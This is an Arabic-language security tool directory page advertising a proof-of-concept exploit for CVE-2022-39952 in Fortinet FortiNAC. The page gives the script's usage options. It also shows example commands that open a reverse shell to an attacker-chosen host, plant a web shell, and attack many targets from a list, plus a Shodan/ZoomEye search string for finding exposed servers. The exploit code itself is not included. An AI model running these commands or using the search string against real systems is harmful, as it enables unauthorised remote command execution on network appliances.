Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-39952-better — إثبات المفهوم لـ CVE-2022-39952 الذي يؤثر على Fortinet FortiNAC. | Kitploit
أدوات/GitHubGitHub/dkstar11q/cve-2022-39952-better
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالفريق الأحمر
GitHubdkstar11q/cve-2022-39952-better

CVE-2022-39952-better

إثبات المفهوم لـ CVE-2022-39952 الذي يؤثر على Fortinet FortiNAC.

عرض المستودع
1منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

FortiNAC CVE-2022-39952

PoC لـ CVE-2022-39952 المؤثر على Fortinet FortiNAC.

هذا الاستغلال يسمح للمهاجم بتنفيذ أوامر عشوائية على خادم FortiNAC. يعتمد على PoC المطور من قبل horizon3ai، مع خيارات إضافية لاستهداف عدة مضيفين.

تنويه: هذا الاستغلال لأغراض تعليمية فقط. يُرجى استخدامه بمسؤولية وبإذن.

الاستخدام:

root@kitploit:~
usage: exploit.py [-h] [-t TARGET] [-l LIST] [-lh LHOST] [-lp LPORT]

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        The IP address of the target
  -l LIST, --list LIST  List of targets
  -lh LHOST, --lhost LHOST
                        The local host for the reverse shell
  -lp LPORT, --lport LPORT
                        The local port for the reverse shell

لاستخدام هذا الاستغلال، يجب أن يكون لديك Python 3.x مثبتاً على نظامك.

المتطلبات:

root@kitploit:~
Python 3.x
requests module
concurrent.futures module

أمثلة:

تنفيذ شل عكسية على هدف واحد:

root@kitploit:~
$ python exploit.py -t 192.168.1.100 -lh 192.168.1.10 -lp 4444

تنفيذ ويب شل على هدف واحد:

root@kitploit:~
$ python exploit.py -t 192.168.1.100

تنفيذ ويب شل على عدة أهداف من قائمة:

root@kitploit:~
$ python exploit.py -l targets.txt

ملاحظة:

تم اختبار هذا الاستغلال على عدد محدود من الأهداف فقط، لذا قد تختلف فعاليته. الدُورك (dork) للعثور على الأهداف المحتملة على ZoomEye و Shodan هو:

title:"FortiNAC" +"JSESSIONID"

تنزيل الأداة